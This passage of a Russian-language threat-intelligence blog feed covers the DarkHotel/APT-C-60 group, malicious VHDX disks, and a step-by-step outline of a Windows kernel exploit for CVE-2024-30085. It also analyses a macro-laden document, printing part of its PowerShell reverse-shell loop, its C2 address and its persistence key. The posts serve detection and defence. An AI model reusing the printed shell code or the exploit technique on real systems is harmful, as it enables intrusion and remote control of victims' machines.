<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-1024x1024.jpg 1024w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-300x300.jpg 300w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-150x150.jpg 150w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-768x768.jpg 768w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#hunt</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#apt</span> <span class="hashtag">#news</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>APT-C-60, или DarkHotel</title>
		<link>/apt-c-60-or-darkhotel/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Thu, 14 Nov 2024 11:33:54 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/apt-c-60-%d0%b8%d0%bb%d0%b8-darkhotel/</guid>

					<description><![CDATA[❓ APT-C-60, или DarkHotel 💿 Мы как-то рассказывали про использование VHDX-файла в атаках и почему это удобно (нет, это не призыв к действию). Сам пост вы можете найти по ссылке. Тогда же…]]></description>
										<content:encoded><![CDATA[<p>❓ <strong>APT-C-60, или DarkHotel</strong></p>
<p>💿 Мы как-то рассказывали про использование VHDX-файла в атаках и почему это удобно (нет, это не призыв к действию). Сам пост вы можете <a href="https://t.me/ptescalator/98" rel="noopener" target="_blank">найти по ссылке.</a> Тогда же мы <span class="spoiler">упомянули</span>, что по этой теме скоро выйдет исследование. Да, это наконец-то произошло!</p>
<p>🕵️‍♂️ <strong>Спешим вам напомнить про группировку APT-C-60. </strong>Это кибершпионская группа, впервые выявленная в 2021 году. Она нацелена на промышленные компании, особенно на производителей полупроводников в Южной Корее, а также на объекты в Восточной Азии.</p>
<p>Группировка использует фишинговые письма с вредоносными вложениями и эксплуатирует уязвимости в программном обеспечении (среди которых уязвимости в WPS Office) для внедрения вредоносного ПО под названием SpyGlace</p>
<p>В последнее время группировка использует уязвимости в продуктах WPS Office (CVE-2024-7262), однако ранее в своих атаках она как раз использовали виртуальный диск. В сентябре 2024 года мы заметили один из новых дисков и решили, что будет полезно рассказать об этом.</p>
<p>Другие исследователи связывают эту группировку с одним общим кластером <strong>под названием DarkHotel</strong>. Мы покажем, откуда взялась такая взаимосвязь, и еще раз убедимся, что исследовать метаданные — это важно.</p>
<p>☕️ Новое исследование можно <a href="https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/dark-hotel-zoopark-gruppirovok-i-obshhih-tehnik/?utm_source=tg_esc&#038;utm_medium=post&#038;utm_campaign=darkhotel&#038;utm_content=14_11" rel="noopener" target="_blank">найти на нашем сайте</a>.</p>
<p>Приятного чтения!</p>
<p><span class="hashtag">#TI</span> <span class="hashtag">#news</span> <span class="hashtag">#APT</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Виртуальный диск как начало атаки</title>
		<link>/virtual-disk-as-the-start-of-an-attack/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 25 Sep 2024 18:19:46 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[TI]]></category>
		<category><![CDATA[tips]]></category>
		<category><![CDATA[tools]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%b2%d0%b8%d1%80%d1%82%d1%83%d0%b0%d0%bb%d1%8c%d0%bd%d1%8b%d0%b9-%d0%b4%d0%b8%d1%81%d0%ba-%d0%ba%d0%b0%d0%ba-%d0%bd%d0%b0%d1%87%d0%b0%d0%bb%d0%be-%d0%b0%d1%82%d0%b0%d0%ba%d0%b8/</guid>

					<description><![CDATA[🟥 ⚔️ 💿 Виртуальный диск как начало атаки В начале сентября эксперты группы киберразведки TI департамента PT ESC обнаружили интересный VHDX-файл, который оказался частью цепочки атаки на организации в странах Азии. Мы…]]></description>
										<content:encoded><![CDATA[<p>🟥  ⚔️ 💿 <strong>Виртуальный диск как начало атаки</strong></p>
<p>В начале сентября эксперты группы киберразведки TI департамента PT ESC обнаружили интересный VHDX-файл, который оказался частью цепочки атаки на организации в странах Азии. Мы не знаем точного исходного вектора, но, скорее всего, файл распространялся через фишинг.</p>
<p>✍️ <strong>VHDX-файл</strong> — это виртуальный диск, который можно подключить к системе начиная с Windows 8 двойным нажатием мыши. Он будет считаться логическим томом до выключения системы. </p>
<p>Как и любой контейнер, VHDX-файл может выступать в роли вредоносного объекта. Исследователь Уилл Дорманн в посте от 2019 года <a href="https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/" rel="noopener" target="_blank">рассказал</a>, что с помощью специально подготовленного образа можно спровоцировать системную ошибку в Windows и вызвать «синий экран смерти».</p>
<p>👾 В атаках мы редко видим использование этого контейнера, однако виртуальный диск может содержать в себе вредоносные файлы, которые должна запустить жертва. Хакер может убедить жертву сделать это через техники социальной инженерии. Для начала заражения устройства жертве достаточно открыть присланный ей диск и запустить вредоносный файл внутри него. Схема заражения (<em>например, как на первом скриншоте</em>) такая же, как в случае, если бы пользователю прислали архив с таким же вредоносным вложенным файлом.</p>
<p>💡 Для хакеров преимущество в использовании VHDX-файлов (как и в использовании ZIP-файлов) заключается в том, что они <strong>не подпадают под действие MoTW</strong> (Mark of the Web): при запуске документа из этих контейнеров не включается режим Protected View, а Windows SmartScreen не предупреждает жертву об опасности. Стоит также отметить, что под VHDX-формат приспособлено меньшее количество антивирусных решений, чем под те же ISO-файлы. Следовательно, при попадании в систему образ вряд ли будет моментально удален этим СЗИ.</p>
<p>Хотя VHDX-файлы и редко используются в атаках, TI-аналитику, как и любому другому исследователю, важно уметь качественно анализировать эти файлы, чтобы не упустить важные детали, которые могут помочь провести атрибуцию или дать дополнительные IoC, позволяющие построить связи с другими атаками.</p>
<p><strong>Хакеры допускают ошибки:</strong> они могут использовать один VHDX-файл в двух разных атаках или же загрузить ошибочные файлы. В любом из этих случаев злоумышленники, как правило, удаляют файлы, а так как это диск, то аналитик может попробовать их восстановить (в том числе с точными датами создания этих файлов) — другими словами, аналитик может построить таймлайн изменения файлов на диске. Это можно сделать с помощью специальных инструментов для проведения форензики.</p>
<p>👀 <strong>Рассмотрим наиболее эффективные методы и инструменты, которые можно использовать для анализа диска:</strong></p>
<p><strong>•</strong> <strong>Создание виртуальной машины и монтирование диска в нее</strong>. Это позволит посмотреть файлы в проводнике и увидеть то, что получила жертва атаки (но не удаленные файлы).</p>
<p><strong>•</strong> <strong>Autopsy</strong> — универсальный инструмент для исследования образов, который может получать данные из множества файлов разных типов, физических дисков, сырых образов. Есть таймлайн изменения файлов внутри образа (<em>пример — на втором скриншоте</em>).</p>
<p><strong>• FTK Imager</strong> — аналог программы Autopsy, показавший наилучшие результаты в извлечении удаленных файлов с диска.</p>
<p>🛡  <strong>Как вариант защиты от атак с использованием VHDX</strong> стоит использовать почтовые фильтры, запрещающие передачу этого типа файла во вложениях писем — как от внешних отправителей, так и от внутренних.</p>
<p>В скором времени мы опубликуем статью, в которой детально разберем эту атаку. Следите за новостями.</p>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/09/photo_70@25-09-2024_18-19-47-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/09/photo_70@25-09-2024_18-19-47-1024x1024.jpg 1024w, /wp-content/uploads/2024/09/photo_70@25-09-2024_18-19-47-300x300.jpg 300w, /wp-content/uploads/2024/09/photo_70@25-09-2024_18-19-47-150x150.jpg 150w, /wp-content/uploads/2024/09/photo_70@25-09-2024_18-19-47-768x767.jpg 768w, /wp-content/uploads/2024/09/photo_70@25-09-2024_18-19-47.jpg 1202w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#ti</span> <span class="hashtag">#tool</span> <span class="hashtag">#tip</span> <span class="hashtag">#news</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Эксплойт для CVE-2024-30085</title>
		<link>/exploit-for-cve-2024-30085/</link>
		
		<dc:creator><![CDATA[author_vr]]></dc:creator>
		<pubDate>Tue, 10 Sep 2024 12:26:40 +0000</pubDate>
				<category><![CDATA[Vulnerability Research]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[escvr]]></category>
		<category><![CDATA[news]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bc%d1%8b-esc-vr-%d1%83%d1%81%d0%bf%d0%b5%d1%88%d0%bd%d0%be-%d0%b2%d0%be%d1%81%d0%bf%d1%80%d0%be%d0%b8%d0%b7%d0%b2%d0%b5%d0%bb%d0%b8-%d1%8d%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb/</guid>

					<description><![CDATA[Мы, ESC-VR, успешно воспроизвели эксплойт для CVE-2024-30085 😎 Уязвимость фигурировала на прошедшем в Pwn2Own 2024 в Ванкувере, где Team Theori использовала эксплойт для этой уязвимости в цепочке эксплойтов, осуществляющих Guest-To-Host-Escape из-под управления…]]></description>
										<content:encoded><![CDATA[<strong>Мы, ESC-VR, успешно воспроизвели эксплойт для </strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30085" rel="noopener" target="_blank">CVE-2024-30085</a>  😎<br />
<br />
Уязвимость фигурировала на прошедшем в Pwn2Own 2024 в Ванкувере, где Team Theori использовала эксплойт для этой уязвимости в цепочке эксплойтов, осуществляющих Guest-To-Host-Escape из-под управления VMware Workstation, за что и получили свои заслуженные 13 очков в номинации Master Of Pwn.<br />
<br />
Соревнования по типу pwn2own и matrixcup помогают подсветить реально эксплуатируемые уязвимости, эксплойты для которых, как правило, не разглашаются (в результате чего образуется состояние Known-Unkown, когда известно, что эксплойт есть, но как он работает неизвестно), и обратить на них особое внимание, ведь за подобными соревнованиями следим не только мы, но и злоумышленник, который может их воспроизвести и проэксплуатировать против незапатченной системы.<br />
<br />
🧐 <code>Cldflt.sys</code> — это драйвер мини-фильтр, отвечающий за синхронизацию между пользовательской файловой системой и облаком OneDrive. В драйвере существовала ошибка <code>CWE-122</code>, возникающая в результате некорректной проверки размера bitmap, содержимое которого получается из <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/reparse-points" rel="noopener" target="_blank">Reparse Point</a>. При этом память, аллоцируемая под bitmap, имеет фиксированный <strong>размер 4096 байт</strong>, но при этом не проверяется размер актуальных данных, которые будут скопированы в аллоцированную память. <br />
<br />
Наш эксплойт утилизирует <a href="https://blog.quarkslab.com/playing-with-the-windows-notification-facility-wnf.html" rel="noopener" target="_blank">WNF-</a> и <a href="https://csandker.io/2022/05/24/Offensive-Windows-IPC-3-ALPC.html" rel="noopener" target="_blank">ALPC-</a> подсистемы для получения примитивов на запись и чтение, конкретно структуры <code>_WNF_STATE_DATA и _ALPC_HANDLE_ENTRY</code>.<br />
<br />
💡 <strong>Немного деталей о том, как наш эксплойт работает:</strong><br />
<br />
1️⃣ Создает множества чанков, <strong>размером 4096 байт</strong>, через <code>NtCreateWnfStateName</code> и <code>NtAlpcCreateResourceReserve</code>. Таким образом последовательно в памяти размещается <code>_WNF_STATE_DATA и _ALPC_HANDLE_ENTRY</code>.<br />
<br />
2️⃣ Создает множества дыр в последовательности созданной на шаге 1, через <code>NtDeleteWnfStateData</code>.<br />
<br />
3️⃣ Триггерит уязвимость, таким образом <strong>bitmap</strong> размещается в одной из заранее подготовлены дыр. Размер <strong>bitmap</strong> задается равный <strong>4096 + 16</strong>, чтобы перезаписать размер данных (<code>_WNF_STATE_DATA.DataSize</code>), на которые указывает <code>_WNF_STATE_DATA.Data</code>.<br />
<br />
4️⃣ Перезаписывает через <code>NtUpdateWnfStateData</code> указатели в <code>_ALPC_HANDLE_ENTRY</code>.<br />
<br />
5️⃣ Осуществляет через <code>NtAlpcSendWaitReceivePort</code> запись и чтение по произвольному адресу.<br />
<br />
6️⃣ Крадет Token у процесса System (<strong>Token Stealing</strong>).<br />
<br />
Конечно же, мы не могли не протестировать наши собственные продукты. И они нас не разочаровали: например, PT Sandbox обнаруживает эксплуатацию данной уязвимости.<br />
<br />
<strong>Вердикты:</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">
Exploit.Win32.Generic.d,
Exploit.Win32.Generic.a,
Rootkit.Win32.Generic.a
</code></span></pre><br />
<br />
<span class="hashtag">#escvr</span> <span class="hashtag">#cve</span> <span class="hashtag">#news</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>!!р^д**н**c</title>
		<link>/rdnc/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 14 Aug 2024 15:46:56 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d1%80%d0%b4%d0%bdc/</guid>

					<description><![CDATA[!!р^д**н**c 🤔 Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ. Он содержит текст муниципального правового акта, который не отображается корректно, в связи…]]></description>
										<content:encoded><![CDATA[<p><strong>!!р^д**н**c</strong> 🤔</p>
<p>Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ.</p>
<p>Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса.</p>
<p>Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (<code>;; → у ; ** → o ; ?? → a</code> и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде <code>PowerShell-скрипта</code>. </p>
<p>Полезная нагрузка находится в содержимом документа после строки <code>DigitalRSASignature</code> и состоит из двух частей, закодированных в Base64 и разделенных строкой <code>CHECKSUM</code> — <code>&lt;part1&gt;CHECKSUM&lt;part2&gt;</code>, которые декодируются и записываются в файлы:</p>
<p><strong>•</strong> <code>&lt;part1&gt; -&gt; %USERPROFILE%\\UserCache.ini.hta   </code><br />
<strong>•</strong> <code>&lt;part2&gt; -&gt; %USERPROFILE%\\UserCache.ini</code></p>
<p><code>UserCache.ini.hta</code> прописывается макросом в автозапуск <code>Windows Explorer</code> через ключ реестра <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD</code>. Назначение данного файла — запустить исполнение файла <code>UserCache.ini</code>.</p>
<p><code>UserCache.ini</code> представляет собой легковесный реверс-шелл, который использует узел <code>94.103.85.47</code> (Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с <code>http://94.103.85.47:80/api/texts/&lt;client_id&gt;</code>, где <code>&lt;client_id&gt; = &lt;имя компьютера&gt;_&lt;имя пользователя&gt;_&lt;серийник тома жесткого диска&gt;</code>.</p>
<p><strong>Команды передаются в формате XML и содержат несколько атрибутов: </strong></p>
<p>• <code>CountRuns</code> — сколько раз нужно выполнить команду;<br />
• <code>Interval</code> — интервал ожидания в минутах между последовательными выполнениями одной команды;<br />
• <code>Module</code> — закодированная в Base64 команда.</p>

<pre class="wp-block-code"><span><code class="hljs language-powershell">
...
<span class="hljs-keyword">try</span> {
  <span class="hljs-variable">$Commands</span> = &#91;<span class="hljs-built_in">xml</span>]<span class="hljs-variable">$Configs</span>;
  <span class="hljs-variable">$cycle_num</span> = <span class="hljs-number">0</span>;
  
  <span class="hljs-keyword">while</span>(<span class="hljs-variable">$true</span>){
    <span class="hljs-variable">$num_commands_completely_executed</span> = <span class="hljs-number">0</span>;
    <span class="hljs-variable">$num_commands_executed</span> = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$CommandConfig</span> <span class="hljs-keyword">in</span> <span class="hljs-variable">$Commands</span>.Configs.Config)
    {
      <span class="hljs-variable">$num_commands_executed</span> += <span class="hljs-number">1</span>;
      <span class="hljs-variable">$quot</span> = &#91;<span class="hljs-built_in">int</span>]&#91;<span class="hljs-type">Math</span>]::Floor( <span class="hljs-variable">$cycle_num</span> / &#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$CommandConfig</span>.Interval);
      <span class="hljs-variable">$rem</span>  = &#91;<span class="hljs-built_in">int</span>]&#91;<span class="hljs-type">Math</span>]::Floor( <span class="hljs-variable">$cycle_num</span> % &#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$CommandConfig</span>.Interval);
  
      <span class="hljs-keyword">if</span>(<span class="hljs-variable">$quot</span> <span class="hljs-operator">-lt</span> &#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$Command</span>.CountRuns <span class="hljs-operator">-and</span> <span class="hljs-variable">$rem</span> <span class="hljs-operator">-eq</span> <span class="hljs-number">0</span>){
        <span class="hljs-variable">$command_expr</span> = FromBase64 <span class="hljs-variable">$CommandConfig</span>.Module;
        <span class="hljs-keyword">try</span>{
          <span class="hljs-built_in">Invoke-Expression</span>(<span class="hljs-variable">$command_expr</span>);
        }
        <span class="hljs-keyword">catch</span> {}
      }
  
      <span class="hljs-keyword">if</span>((&#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$CommandConfig</span>.Interval * &#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$CommandConfig</span>.CountRuns) <span class="hljs-operator">-lt</span> &#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$cycle_num</span>){
        <span class="hljs-variable">$num_commands_completely_executed</span> += <span class="hljs-number">1</span>;
      }
    }
  
    <span class="hljs-built_in">Start-Sleep</span> <span class="hljs-number">60</span>;
    <span class="hljs-keyword">if</span>(&#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$num_commands_completely_executed</span> <span class="hljs-operator">-eq</span> &#91;<span class="hljs-built_in">int</span>]<span class="hljs-variable">$num_commands_executed</span>){
      <span class="hljs-keyword">break</span>;
    }
    <span class="hljs-variable">$cycle_num</span> += <span class="hljs-number">1</span>;
  }
}
<span class="hljs-keyword">catch</span> {}
...
</code></span></pre>

<p>Для блокировки автоматического выполнения макросов можно воспользоваться <a href="https://support.microsoft.com/en-gb/office/add-ins-and-vba-macros-disabled-20e11f79-6a41-4252-b54e-09a76cdf5101" rel="noopener" target="_blank">руководством от Microsoft</a>.</p>
<p><strong>IoCs:</strong></p>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">
Постановление_по_ГО_updated.doc
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b
</code></span></pre>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">
UserCache.ini.hta
e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9
</code></span></pre>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">
UserCache.ini
ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7
</code></span></pre>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">
94.103.85.47
</code></span></pre>

<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/08/photo_41@14-08-2024_15-46-56-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/08/photo_41@14-08-2024_15-46-56-1024x1024.jpg 1024w, /wp-content/uploads/2024/08/photo_41@14-08-2024_15-46-56-300x300.jpg 300w, /wp-content/uploads/2024/08/photo_41@14-08-2024_15-46-56-150x150.jpg 150w, /wp-content/uploads/2024/08/photo_41@14-08-2024_15-46-56-768x767.jpg 768w, /wp-content/uploads/2024/08/photo_41@14-08-2024_15-46-56.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<p><span class="hashtag">#malware</span> <span class="hashtag">#news</span> <span class="hashtag">#detect</span> <span class="hashtag">#ti</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
